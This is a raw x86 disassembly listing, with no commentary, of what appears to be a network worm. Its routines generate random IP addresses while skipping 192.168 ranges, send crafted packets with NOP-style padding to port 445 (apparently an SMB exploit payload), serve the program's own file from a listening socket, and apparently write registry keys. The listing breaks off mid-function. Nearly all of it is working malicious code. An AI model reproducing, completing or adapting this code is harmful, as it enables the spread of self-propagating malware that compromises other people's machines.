dd 2000h, 73622E60h, 73h, 11000h, 300000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 0DE800h, 400000h, 0DE800h
dd 1E0000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 97000h, 500000h, 97000h
dd 2C0000h, 3 dup(0)
dd 6000h, 0C0h, 79h dup(0)
dd 40C03100h, 4244C8Bh, 60441F7h, 74000000h, 24448B0Fh
dd 24548B08h, 0B8028910h, 3
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_43DFC9 proc near ; CODE XREF: .data:0043E101�p
; .data:0043E12F�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_43DFE6: ; CODE XREF: sub_43DFC9+44�j
; sub_43DFC9+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43E015
cmp esi, [esp+1Ch+arg_4]
jz short loc_43E015
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43DFE6
call dword ptr [ebx+esi*4+8]
jmp short loc_43DFE6
; ---------------------------------------------------------------------------
loc_43E015: ; CODE XREF: sub_43DFC9+2A�j
; sub_43DFC9+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43DFC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E023 proc near ; CODE XREF: .data:0043E0F4�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_43F761
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43E023 endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
mov dword ptr ds:loc_40408C, eax
mov dword ptr ds:loc_40408F+1, ebx
test dword ptr [eax+4], 6
jnz loc_43E128
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
mov dword ptr ds:loc_40408F+1, eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43E086: ; CODE XREF: .data:0043E11F�j
cmp esi, 0FFFFFFFFh
jz loc_43E137
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43E116
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword ptr ds:loc_40402E+2, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword ptr ds:loc_404034, eax
mov eax, [edx+4]
mov dword ptr ds:loc_404034+4, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, loc_404034+8
mov esi, dword ptr ds:loc_404034
rep movsd
lea edi, loc_404034+8
mov dword ptr ds:loc_404034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43E116
js short loc_43E124
mov edi, [ebx+8]
push ebx
call sub_43E023
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43DFC9
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43E116: ; CODE XREF: .data:0043E097�j
; .data:0043E0EC�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43E086
; ---------------------------------------------------------------------------
loc_43E124: ; CODE XREF: .data:0043E0EE�j
xor eax, eax
jmp short loc_43E199
; ---------------------------------------------------------------------------
loc_43E128: ; CODE XREF: .data:0043E066�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43DFC9
add esp, 0Ch
loc_43E137: ; CODE XREF: .data:0043E089�j
push 0
mov dword ptr ds:loc_404010, 0Bh
push 0Bh
call sub_43F905
add esp, 8
or eax, eax
jnz short loc_43E172
push 0
mov dword ptr ds:loc_404010, 8
push 8
call sub_43F905
add esp, 8
or eax, eax
jnz short loc_43E172
mov eax, 1
jmp short loc_43E199
; ---------------------------------------------------------------------------
loc_43E172: ; CODE XREF: .data:0043E14F�j
; .data:0043E169�j
cmp eax, 0FFFFFFFFh
jz short loc_43E1A1
push eax
push dword ptr ds:loc_404010
call sub_43F905
add esp, 8
push dword ptr ds:loc_404010
call sub_43F8ED
add esp, 4
mov eax, 1
loc_43E199: ; CODE XREF: .data:0043E126�j
; .data:0043E170�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_43E1A1: ; CODE XREF: .data:0043E175�j
cmp dword ptr ds:loc_404029+3, 0
jnz short loc_43E1B1
mov eax, 1
jmp short loc_43E199
; ---------------------------------------------------------------------------
loc_43E1B1: ; CODE XREF: .data:0043E1A8�j
mov eax, dword ptr ds:loc_404029+3
push 0Bh
jmp eax
; ---------------------------------------------------------------------------
dw 0B858h
dd 1, 0A164D7EBh, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset sub_40401C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp-18h], esp
push eax
fnstcw word ptr [esp]
or word ptr [esp], 300h
fldcw word ptr [esp]
add esp, 4
push 0
push 0
push 404028h
push offset sub_404024
push 404020h
call sub_43F8B1
push dword ptr ds:sub_404024+4
push dword ptr ds:sub_404024
push dword ptr ds:sub_40401C+4
mov dword ptr ds:loc_404010+4, esp
call sub_43F609
add esp, 18h
xor ecx, ecx
mov [ebp-4], ecx
push eax
call sub_43F8C9
leave
retn
; ---------------------------------------------------------------------------
db 64h, 0A3h, 0
dd 0C3000000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E245 proc near ; CODE XREF: sub_43E2E0+12�p
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 2
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_43F8A5
add esp, 0Ch
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_43E268: ; CODE XREF: sub_43E245+28�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E268
mov ebx, eax
mov [ebp+var_2], bl
mov [ebp+var_1], 0
jmp short loc_43E290
; ---------------------------------------------------------------------------
loc_43E27A: ; CODE XREF: sub_43E245+55�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_43E290: ; CODE XREF: sub_43E245+33�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_43E27A
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_43E2BC
; ---------------------------------------------------------------------------
loc_43E2AA: ; CODE XREF: sub_43E245+88�j
push offset sub_404DE5
push edi
call sub_43F929
add esp, 8
add [ebp+var_3], 1
loc_43E2BC: ; CODE XREF: sub_43E245+63�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_43E2AA
push [ebp+arg_8]
push edi
call sub_43F929
add esp, 8
pop edi
pop esi
pop ebx
leave
retn
sub_43E245 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E2E0 proc near ; CODE XREF: sub_43F401+97�p
var_32 = byte ptr -32h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push 404DE3h
lea eax, [ebp+var_32]
push eax
push [ebp+arg_0]
call sub_43E245
add esp, 0Ch
lea eax, [ebp+var_32]
push eax
call sub_43F719
leave
retn
sub_43E2E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E305 proc near ; CODE XREF: .data:0043F3BF�p
; sub_43F401+F1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push eax
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43F869
mov edi, eax
or edi, edi
jz short loc_43E335
xor eax, eax
jmp short loc_43E36D
; ---------------------------------------------------------------------------
loc_43E335: ; CODE XREF: sub_43E305+2A�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_43F899
mov edi, eax
push [ebp+var_4]
call sub_43F875
or edi, edi
jz short loc_43E35D
xor eax, eax
jmp short loc_43E36D
; ---------------------------------------------------------------------------
loc_43E35D: ; CODE XREF: sub_43E305+52�j
cmp [ebp+var_8], 1
jnz short loc_43E36A
mov eax, 2
jmp short loc_43E36D
; ---------------------------------------------------------------------------
loc_43E36A: ; CODE XREF: sub_43E305+5C�j
xor eax, eax
inc eax
loc_43E36D: ; CODE XREF: sub_43E305+2E�j
; sub_43E305+56�j ...
pop edi
leave
retn
sub_43E305 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E370 proc near ; CODE XREF: .data:0043F398�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43F881
mov edi, eax
or edi, edi
jz short loc_43E395
xor eax, eax
jmp short loc_43E3C0
; ---------------------------------------------------------------------------
loc_43E395: ; CODE XREF: sub_43E370+1F�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_43F88D
mov edi, eax
push [ebp+var_4]
call sub_43F875
or edi, edi
jz short loc_43E3BD
xor eax, eax
jmp short loc_43E3C0
; ---------------------------------------------------------------------------
loc_43E3BD: ; CODE XREF: sub_43E370+47�j
xor eax, eax
inc eax
loc_43E3C0: ; CODE XREF: sub_43E370+23�j
; sub_43E370+4B�j
pop edi
leave
retn
sub_43E370 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 200h
push ebx
push esi
push edi
xor ebx, ebx
push 0
push 100h
lea eax, [ebp-100h]
push eax
push dword ptr [ebp+8]
call sub_43F5C1
cmp eax, 0FFFFFFFFh
jz loc_43E507
push offset sub_404DDF
lea eax, [ebp-100h]
push eax
call sub_43F941
add esp, 8
or eax, eax
jz loc_43E4C9
push 404DDBh
lea edx, [ebp-100h]
push edx
call sub_43F941
add esp, 8
or eax, eax
jz loc_43E4C9
push 0
push 3Dh
push 404D9Dh
push dword ptr [ebp+8]
call sub_43F5CD
push dword ptr ds:loc_403004
push 404D86h
lea eax, [ebp-200h]
push eax
call sub_43F911
add esp, 0Ch
lea ecx, [ebp-200h]
or eax, 0FFFFFFFFh
loc_43E45C: ; CODE XREF: .data:0043E461�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E45C
push 0
push eax
lea edx, [ebp-200h]
push edx
push dword ptr [ebp+8]
call sub_43F5CD
loc_43E475: ; CODE XREF: .data:0043E4BB�j
mov eax, dword ptr ds:loc_403004
mov edi, eax
sub edi, ebx
cmp edi, 1000h
jb short loc_43E48B
mov edi, 1000h
loc_43E48B: ; CODE XREF: .data:0043E484�j
or edi, edi
jz short loc_43E4BD
push 0
push edi
mov eax, ebx
add eax, dword ptr ds:loc_403004+4
push eax
push dword ptr [ebp+8]
call sub_43F5CD
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_43E507
cmp esi, 1000h
jb short loc_43E4BD
add ebx, esi
push 64h
call sub_43F779
jmp short loc_43E475
; ---------------------------------------------------------------------------
loc_43E4BD: ; CODE XREF: .data:0043E48D�j
; .data:0043E4B0�j
push offset sub_404098
call sub_43F731
jmp short loc_43E4EB
; ---------------------------------------------------------------------------
loc_43E4C9: ; CODE XREF: .data:0043E406�j
; .data:0043E422�j
push 0
push 15h
push 404D70h
push dword ptr [ebp+8]
call sub_43F5CD
push 0
push 0Dh
push 40409Ch
push dword ptr [ebp+8]
call sub_43F5CD
loc_43E4EB: ; CODE XREF: .data:0043E4C7�j
push 7D0h
call sub_43F779
push 2
push dword ptr [ebp+8]
call sub_43F5D9
push dword ptr [ebp+8]
call sub_43F561
loc_43E507: ; CODE XREF: .data:0043E3EA�j
; .data:0043E4A8�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 0
push offset sub_404098
call sub_43F725
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push 403010h
call sub_43F749
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_43E54D
push 1
call sub_43F6B9
loc_43E54D: ; CODE XREF: .data:0043E544�j
push 0
push ebx
call sub_43F6DD
mov dword ptr ds:loc_403004, eax
push eax
push 0
call sub_43F73D
mov dword ptr ds:loc_403004+4, eax
push 0
lea eax, [ebp-30h]
push eax
push dword ptr ds:loc_403004
push dword ptr ds:loc_403004+4
push ebx
call sub_43F755
push ebx
call sub_43F6F5
push 0
push 1
push 2
call sub_43F5E5
mov esi, eax
push 10h
lea eax, [ebp-24h]
push eax
call sub_43F76D
mov word ptr [ebp-24h], 2
and dword ptr [ebp-20h], 0
mov word ptr [ebp-26h], 0
loc_43E5AD: ; CODE XREF: .data:0043E5ED�j
movzx eax, word ptr [ebp-26h]
add eax, 50h
mov word ptr ds:loc_404094, ax
movzx eax, word ptr ds:loc_404094
push eax
call sub_43F591
mov edx, eax
mov [ebp-22h], dx
push 10h
lea eax, [ebp-24h]
push eax
push esi
call sub_43F555
mov [ebp-2Ch], eax
inc word ptr [ebp-26h]
or eax, eax
jz short loc_43E5EF
movzx eax, word ptr [ebp-26h]
cmp eax, 0FDE8h
jl short loc_43E5AD
loc_43E5EF: ; CODE XREF: .data:0043E5E2�j
push 64h
push esi
call sub_43F5B5
mov dword ptr [ebp-4], 10h
loc_43E5FE: ; CODE XREF: .data:0043E629�j
lea eax, [ebp-4]
push eax
lea eax, [ebp-14h]
push eax
push esi
call sub_43F549
mov edi, eax
lea eax, [ebp-34h]
push eax
push 0
push edi
push 40141Ah
push 0
push 0
call sub_43F79D
push eax
call sub_43F6F5
jmp short loc_43E5FE
; ---------------------------------------------------------------------------
db 5Fh
dd 0C3C95B5Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E630 proc near ; CODE XREF: .data:0043EE63�p
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_13]
lea esi, sub_4040AA
mov ecx, 4
rep movsd
lea edi, [ebp+var_18]
lea esi, loc_4040B9+1
mov ecx, 5
rep movsb
loc_43E659: ; CODE XREF: sub_43E630+51�j
; sub_43E630+74�j
call sub_43F8F9
mov ecx, 0DDh
cdq
idiv ecx
lea edi, [edx+3]
mov ebx, edi
mov [ebp+var_3], bl
mov [ebp+var_2], 0
jmp short loc_43E6AA
; ---------------------------------------------------------------------------
loc_43E676: ; CODE XREF: sub_43E630+81�j
mov al, [ebp+var_3]
movzx edx, [ebp+var_2]
cmp al, [ebp+edx+var_13]
jz short loc_43E659
movzx eax, [ebp+var_2]
cmp eax, 5
jnb short loc_43E6A6
movzx eax, [ebp+var_3]
movzx edx, [ebp+var_2]
movzx ecx, [ebp+edx+var_13]
cmp eax, ecx
jb short loc_43E6A6
movzx edx, [ebp+edx+var_18]
cmp eax, edx
jbe short loc_43E659
loc_43E6A6: ; CODE XREF: sub_43E630+5A�j
; sub_43E630+6B�j
inc [ebp+var_2]
loc_43E6AA: ; CODE XREF: sub_43E630+44�j
movzx eax, [ebp+var_2]
cmp eax, 10h
jb short loc_43E676
loc_43E6B3: ; CODE XREF: sub_43E630+AC�j
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_19], bl
movzx eax, [ebp+var_3]
cmp eax, 0C0h
jnz short loc_43E6DE
movzx eax, [ebp+var_19]
cmp eax, 0A8h
jz short loc_43E6B3
loc_43E6DE: ; CODE XREF: sub_43E630+A1�j
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1A], bl
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1B], bl
movzx eax, [ebp+var_1B]
push eax
movzx eax, [ebp+var_1A]
push eax
movzx eax, [ebp+var_19]
push eax
movzx eax, [ebp+var_3]
push eax
push 404D64h
push [ebp+arg_0]
call sub_43F911
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_43E630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E731 proc near ; CODE XREF: .data:0043F068�p
var_89F4 = dword ptr -89F4h
var_89F0 = dword ptr -89F0h
var_89EC = dword ptr -89ECh
var_89E8 = dword ptr -89E8h
var_89E3 = byte ptr -89E3h
var_89E2 = word ptr -89E2h
var_89E0 = byte ptr -89E0h
var_89D8 = byte ptr -89D8h
var_8970 = byte ptr -8970h
var_6900 = byte ptr -6900h
var_68E2 = byte ptr -68E2h
var_6842 = byte ptr -6842h
var_6136 = dword ptr -6136h
var_6126 = byte ptr -6126h
var_6112 = byte ptr -6112h
var_60A2 = byte ptr -60A2h
var_55DE = byte ptr -55DEh
var_403A = byte ptr -403Ah
var_4039 = byte ptr -4039h
var_3FBD = byte ptr -3FBDh
var_37ED = byte ptr -37EDh
var_3342 = byte ptr -3342h
var_3058 = dword ptr -3058h
var_3054 = dword ptr -3054h
var_3050 = dword ptr -3050h
var_304C = word ptr -304Ch
var_304A = word ptr -304Ah
var_3048 = dword ptr -3048h
var_303C = byte ptr -303Ch
var_3039 = byte ptr -3039h
var_300F = byte ptr -300Fh
var_300D = byte ptr -300Dh
var_300C = byte ptr -300Ch
var_2FC7 = byte ptr -2FC7h
var_2F83 = byte ptr -2F83h
var_2987 = byte ptr -2987h
var_21A3 = byte ptr -21A3h
var_2193 = byte ptr -2193h
var_1E6F = byte ptr -1E6Fh
var_1E6B = byte ptr -1E6Bh
var_1E5F = byte ptr -1E5Fh
var_1BDA = byte ptr -1BDAh
var_1BD9 = byte ptr -1BD9h
var_B46 = byte ptr -0B46h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 89F4h
call sub_43F66D
push ebx
push esi
push edi
mov [ebp+var_3054], 1
mov [ebp+var_89F0], 1
lea edi, [ebp+var_89E0]
lea esi, sub_4049F0
movsd
movsd
and [ebp+var_89F4], 0
mov [ebp+var_89E2], 1BDh
push 0
push 1
push 2
call sub_43F5E5
mov [ebp+var_54], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED87
mov eax, [ebp+arg_0]
mov [ebp+var_89EC], eax
push eax
call sub_43F5A9
push 1Dh
push eax
lea edi, [ebp+var_6900]
push edi
call sub_43F785
lea eax, [ebp+var_6900]
push eax
push 404D5Ah
lea eax, [ebp+var_7C]
push eax
call sub_43F911
add esp, 0Ch
xor ebx, ebx
loc_43E7C2: ; CODE XREF: sub_43E731+A2�j
mov dl, [ebp+ebx+var_7C]
mov [ebp+ebx*2+var_50], dl
mov [ebp+ebx*2+var_4F], 0
inc ebx
cmp ebx, 28h
jl short loc_43E7C2
push 60h
push offset sub_404525
lea eax, [ebp+var_303C]
push eax
call sub_43F8D5
lea eax, [ebp+var_7C]
push eax
call sub_43F791
mov edi, eax
shl edi, 1
push edi
lea edi, [ebp+var_50]
push edi
lea edi, [ebp+var_300C]
push edi
call sub_43F8D5
lea eax, [ebp+var_7C]
push eax
call sub_43F791
push 9
push offset sub_40457C
mov edi, eax
shl edi, 1
lea edi, [ebp+edi+var_300D]
push edi
call sub_43F8D5
lea eax, [ebp+var_7C]
push eax
call sub_43F791
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 34h
mov edx, edi
mov [ebp+var_403A], dl
push 1
lea eax, [ebp+var_403A]
push eax
lea eax, [ebp+var_3039]
push eax
call sub_43F8D5
lea eax, [ebp+var_7C]
push eax
call sub_43F791
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 9
mov edx, edi
mov [ebp+var_89E3], dl
push 1
lea eax, [ebp+var_89E3]
push eax
lea eax, [ebp+var_300F]
push eax
call sub_43F8D5
mov eax, [ebp+arg_4]
mov [ebp+var_3058], eax
push 0E29h
push 31h
lea eax, [ebp+var_4039]
push eax
call sub_43F8E1
add esp, 48h
push 10h
lea eax, [ebp+var_304C]
push eax
call sub_43F76D
mov [ebp+var_304C], 2
movsx eax, [ebp+var_89E2]
movzx eax, ax
push eax
call sub_43F591
mov edi, eax
mov [ebp+var_304A], di
mov eax, [ebp+arg_0]
mov [ebp+var_3048], eax
push 10h
lea eax, [ebp+var_304C]
push eax
push [ebp+var_54]
call sub_43F56D
cmp eax, 0FFFFFFFFh
jnz short loc_43E904
mov [ebp+var_3054], 2
jmp loc_43ED7F
; ---------------------------------------------------------------------------
loc_43E904: ; CODE XREF: sub_43E731+1C2�j
push 64h
call sub_43F779
push 0
push 89h
push 404313h
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
push 0
push 0A8h
push 40439Dh
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
push 0
push 0DEh
push 404446h
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
mov eax, [ebp+var_80]
cmp eax, 0FFFFFFFFh
jz short loc_43E9DE
cmp eax, 46h
jge short loc_43E9E3
loc_43E9DE: ; CODE XREF: sub_43E731+2A6�j
jmp loc_43ED75
; ---------------------------------------------------------------------------
loc_43E9E3: ; CODE XREF: sub_43E731+2AB�j
lea eax, [ebp+var_2F83]
mov [ebp+var_89E8], eax
cmp byte ptr [eax], 31h
setnz al
and eax, 1
mov [ebp+var_3050], eax
jz loc_43EAF7
push 0DACh
push 90h
lea eax, [ebp+var_2987]
push eax
call sub_43F8E1
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_21A3]
push eax
call sub_43F8D5
push [ebp+arg_8]
push [ebp+var_3058]
lea eax, [ebp+var_2193]
push eax
call sub_43F8D5
push 4
push 404D55h
lea eax, [ebp+var_1E6F]
push eax
call sub_43F8D5
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_1E6B]
push eax
call sub_43F8D5
push [ebp+var_3058]
call sub_43F791
push eax
push [ebp+var_3058]
lea edi, [ebp+var_1E5F]
push edi
call sub_43F8D5
add esp, 48h
xor ebx, ebx
loc_43EA9F: ; CODE XREF: sub_43E731+38B�j
mov dl, [ebp+ebx+var_2987]
mov [ebp+ebx*2+var_1BDA], dl
mov [ebp+ebx*2+var_1BD9], 0
inc ebx
cmp ebx, 0DACh
jl short loc_43EA9F
mov [ebp+var_82], 0
mov [ebp+var_81], 0
push 1C52h
push 31h
lea eax, [ebp+var_89D8]
push eax
call sub_43F8E1
push 1C52h
push 31h
lea eax, [ebp+var_6112]
push eax
call sub_43F8E1
add esp, 18h
jmp short loc_43EB59
; ---------------------------------------------------------------------------
loc_43EAF7: ; CODE XREF: sub_43E731+2CD�j
push 7D0h
push 90h
lea eax, [ebp+var_68E2]
push eax
call sub_43F8E1
push [ebp+var_3058]
call sub_43F791
push eax
push [ebp+var_3058]
lea edi, [ebp+var_6842]
push edi
call sub_43F8D5
lea eax, [ebp+var_89E0]
push eax
call sub_43F791
push eax
lea edi, [ebp+var_89E0]
push edi
lea edi, [ebp+var_6126]
push edi
call sub_43F8D5
add esp, 24h
mov eax, dword ptr ds:loc_404936+2
mov [ebp+var_6136], eax
loc_43EB59: ; CODE XREF: sub_43E731+3C4�j
push 0
movsx eax, [ebp+var_403A]
add eax, 4
push eax
lea eax, [ebp+var_303C]
push eax
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
push 0
push 68h
push offset sub_404586
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
push 0
push 0A0h
push offset sub_4045EF
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
cmp [ebp+var_3050], 0
jz loc_43ED01
push 68h
push 40479Eh
lea eax, [ebp+var_89D8]
push eax
call sub_43F8D5
push 1B5Ah
lea eax, [ebp+var_1BDA]
push eax
lea eax, [ebp+var_8970]
push eax
call sub_43F8D5
push 70h
push 404807h
lea eax, [ebp+var_6112]
push eax
call sub_43F8D5
push 0A5Eh
lea eax, [ebp+var_B46]
push eax
lea eax, [ebp+var_60A2]
push eax
call sub_43F8D5
push 84h
push offset sub_404878
lea eax, [ebp+var_55DE]
push eax
call sub_43F8D5
add esp, 3Ch
push 0
push 10FCh
lea eax, [ebp+var_89D8]
push eax
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F779
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5C1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED75
push 0
push 0FDCh
lea eax, [ebp+var_6112]
push eax
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short loc_43ED67
jmp short loc_43ED67
; ---------------------------------------------------------------------------
loc_43ED01: ; CODE XREF: sub_43E731+4FA�j
push 7Ch
push 404690h
lea eax, [ebp+var_4039]
push eax
call sub_43F8D5
push 7D0h
lea eax, [ebp+var_68E2]
push eax
lea eax, [ebp+var_3FBD]
push eax
call sub_43F8D5
push 90h
push 40470Dh
lea eax, [ebp+var_37ED]
push eax
call sub_43F8D5
add esp, 24h
mov [ebp+var_3342], 0
push 0
push 0CF8h
lea eax, [ebp+var_4039]
push eax
push [ebp+var_54]
call sub_43F5CD
cmp eax, 0FFFFFFFFh
jnz short $+2
loc_43ED67: ; CODE XREF: sub_43E731+5CC�j
; sub_43E731+5CE�j
push 64h
call sub_43F779
and [ebp+var_3054], 0
loc_43ED75: ; CODE XREF: sub_43E731+216�j
; sub_43E731+258�j ...
push 2
push [ebp+var_54]
call sub_43F5D9
loc_43ED7F: ; CODE XREF: sub_43E731+1CE�j
push [ebp+var_54]
call sub_43F561
loc_43ED87: ; CODE XREF: sub_43E731+53�j
mov eax, [ebp+var_3054]
pop edi
pop esi
pop ebx
leave
retn
sub_43E731 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43ED92 proc near ; CODE XREF: .data:loc_43EE06�p
var_32 = byte ptr -32h
push ebp
